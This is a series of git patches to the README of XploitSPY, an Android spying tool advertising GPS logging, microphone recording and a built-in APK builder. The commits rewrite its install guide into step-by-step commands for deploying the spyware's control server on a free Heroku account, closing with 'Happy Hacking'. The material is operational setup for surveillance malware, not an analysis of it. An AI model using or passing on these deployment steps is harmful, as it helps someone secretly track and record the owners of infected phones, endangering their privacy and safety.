From d9d4c87d8978baeebdc5b912630ccbc4a903bc1f Mon Sep 17 00:00:00 2001 From: MAHESH KUMAR <59735191+RaoMK@users.noreply.github.com> Date: Sat, 22 Feb 2020 13:12:03 +0530 Subject: [PATCH 1/6] Update README.md --- README.md | 61 +++++++++++++++++-------------------------------------- 1 file changed, 19 insertions(+), 42 deletions(-) diff --git a/README.md b/README.md index 8ac28e2..e17b87f 100644 --- a/README.md +++ b/README.md @@ -1,10 +1,8 @@

-
+
A cloud based Android Spying or Monitoring Tool, powered by NodeJS

- - ## Features - GPS Logging - Microphone Recording @@ -21,56 +19,35 @@ A cloud based Android Spying or Monitoring Tool, powered by NodeJS - Command Queuing - Built In APK Builder -## Prerequisites - - Java Runtime Environment 9+ - - See [installation](#Installation) for OS specifics - - NodeJs - - A Server e.g: aws, azure, google cloud, digital ocean - Get Free Server from https://www.heroku.com/ +## Installation on Server and VPS [Click Here](https://github.com/Xploitwizer/XploitSPY) -## Installation +## Installation on [Heroku Free Server](https://heroku.com) -## Video Tutorial : https://youtu.be/6bRs7-0AD04 +0. Create a Account on [Heroku](https://heroku.com) -0. Connect to your server via SSH +1. Click `Create New App` in Heroku Dashboard -1. Install JRE 9+ - - Debian, Ubuntu, Etc - - `sudo apt install openjdk-11-jre-headless` - - Fedora, Oracle, Red Hat, etc - - `sudo yum install java-11-openjdk-devel"` - - Windows - - click [HERE](https://www.oracle.com/technetwork/java/javase/downloads/jre9-downloads-3848532.html) for downloads +2. Enter App Name and click on create app -2. Install NodeJS [Instructions Here](https://nodejs.org/en/download/package-manager/) (If you can't figure this out, you shouldn't really be using this) +3. Now install Heroku CLI on your Computer [Instuctions](https://devcenter.heroku.com/articles/heroku-cli) -3. install PM2 - - `sudo npm install pm2 -g` +4. Now Download the codes [Click here to Download](https://github.com/XploitWizer/XploitSPY/archive/Heroku.zip) -4. Clone this repository - - `git clone https://github.com/XploitWizer/XploitSPY.git` - -5. Now change to the XploitSPY directory and run these commands - - `npm install` <- install dependencies - - `pm2 start index.js` <-- start the script - - `pm2 startup` <- to run XploitSPY on startup +5. Now Extract the Downloaded Zip file and Open the extracted foler -6. Default Username : admin & Default Password : password +6. Open Terminal inside the extracted folder -7. Change the Username & Password - 1. Stop XploitSPY `pm2 stop index` - 2. Open `maindb.json` in a text editor - 3. under `admin` - - set the `username` as plain text - - set the `password` as a LOWERCASE MD5 hash - 4. save the file - 5. run `pm2 restart all` +7. Now Login into Heroku CLI using command `heroku login -i` now enter your login details and hit Enter -8. in your browser navigate to `http://:22533` +8. After Login run this command in terminal `heroku git:remote -a appName` here appName will your app's name that you choose while creating app + +9. Now run follow commands in termial to install packages `heroku buildpacks:add heroku/jvm` then run `heroku buildpacks:add heroku/nodejs` + +10. Now run this command in your terminal `git push heroku master` + +11. All done now it will take time to complete after that you can visit your domain shown in termial. -It's recommended to run XploitSPY behind a reverse proxy such as [NGINX](https://www.nginx.com/resources/wiki/start/topics/tutorials/install/) - - +## Happy Hacking ## Disclaimer XploitWizer Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool.
From 53e903b3e7ceb5f2a31b9695a79b1a204c51a464 Mon Sep 17 00:00:00 2001 From: MAHESH KUMAR <59735191+RaoMK@users.noreply.github.com> Date: Sat, 22 Feb 2020 13:18:45 +0530 Subject: [PATCH 2/6] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e17b87f..1f528d9 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ A cloud based Android Spying or Monitoring Tool, powered by NodeJS 9. Now run follow commands in termial to install packages `heroku buildpacks:add heroku/jvm` then run `heroku buildpacks:add heroku/nodejs` -10. Now run this command in your terminal `git push heroku master` +10. Now run this command in your terminal `git push heroku herooku` 11. All done now it will take time to complete after that you can visit your domain shown in termial. From e24dceadf2f4a9667df0c8bba416f6e21c8d76ed Mon Sep 17 00:00:00 2001 From: chrisstone07 Date: Sat, 22 Feb 2020 13:22:07 +0530 Subject: [PATCH 3/6] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1f528d9..c96f5fe 100644 --- a/README.md +++ b/README.md @@ -43,7 +43,7 @@ A cloud based Android Spying or Monitoring Tool, powered by NodeJS 9. Now run follow commands in termial to install packages `heroku buildpacks:add heroku/jvm` then run `heroku buildpacks:add heroku/nodejs` -10. Now run this command in your terminal `git push heroku herooku` +10. Now run this command in your terminal `git push heroku herooku:master` 11. All done now it will take time to complete after that you can visit your domain shown in termial. From 5264e9c1d686d20463c8f40ab4143498f7c7c632 Mon Sep 17 00:00:00 2001 From: chrisstone07 Date: Sat, 22 Feb 2020 13:24:09 +0530 Subject: [PATCH 4/6] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c96f5fe..bf99e9c 100644 --- a/README.md +++ b/README.md @@ -39,13 +39,13 @@ A cloud based Android Spying or Monitoring Tool, powered by NodeJS 7. Now Login into Heroku CLI using command `heroku login -i` now enter your login details and hit Enter -8. After Login run this command in terminal `heroku git:remote -a appName` here appName will your app's name that you choose while creating app +8. After Login run this command in terminal `heroku git:remote -a appName` here appName will be your app's name that you choose while creating the app. 9. Now run follow commands in termial to install packages `heroku buildpacks:add heroku/jvm` then run `heroku buildpacks:add heroku/nodejs` 10. Now run this command in your terminal `git push heroku herooku:master` -11. All done now it will take time to complete after that you can visit your domain shown in termial. +11. All done now it will take time to complete, after that you can visit your domain shown in terminal. ## Happy Hacking From a7ae664385ca19cb32b7b1fceb34af795cf028ad Mon Sep 17 00:00:00 2001 From: MAHESH KUMAR <59735191+RaoMK@users.noreply.github.com> Date: Sat, 22 Feb 2020 14:02:44 +0530 Subject: [PATCH 5/6] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index bf99e9c..7cfbacb 100644 --- a/README.md +++ b/README.md @@ -21,7 +21,7 @@ A cloud based Android Spying or Monitoring Tool, powered by NodeJS ## Installation on Server and VPS [Click Here](https://github.com/Xploitwizer/XploitSPY) -## Installation on [Heroku Free Server](https://heroku.com) +## Installation on Heroku Free Server 0. Create a Account on [Heroku](https://heroku.com) @@ -33,7 +33,7 @@ A cloud based Android Spying or Monitoring Tool, powered by NodeJS 4. Now Download the codes [Click here to Download](https://github.com/XploitWizer/XploitSPY/archive/Heroku.zip) -5. Now Extract the Downloaded Zip file and Open the extracted foler +5. Now Extract the Downloaded Zip file and Open the extracted folder 6. Open Terminal inside the extracted folder From 6537ef89d376958009c10f4e3b4496a1fbd6d548 Mon Sep 17 00:00:00 2001 From: MAHESH KUMAR <59735191+RaoMK@users.noreply.github.com> Date: Sun, 23 Feb 2020 15:43:06 +0530 Subject: [PATCH 6/6] Updated commands to run --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 7cfbacb..6178367 100644 --- a/README.md +++ b/README.md @@ -31,11 +31,11 @@ A cloud based Android Spying or Monitoring Tool, powered by NodeJS 3. Now install Heroku CLI on your Computer [Instuctions](https://devcenter.heroku.com/articles/heroku-cli) -4. Now Download the codes [Click here to Download](https://github.com/XploitWizer/XploitSPY/archive/Heroku.zip) +4. Now open your terminal and run command `git clone -b herooku https://github.com/XploitWizer/XploitSPY` -5. Now Extract the Downloaded Zip file and Open the extracted folder +5. It will download Latest codes for you in your PC -6. Open Terminal inside the extracted folder +6. Now change the directory to XploitSPY using command `cd XploitSPY` 7. Now Login into Heroku CLI using command `heroku login -i` now enter your login details and hit Enter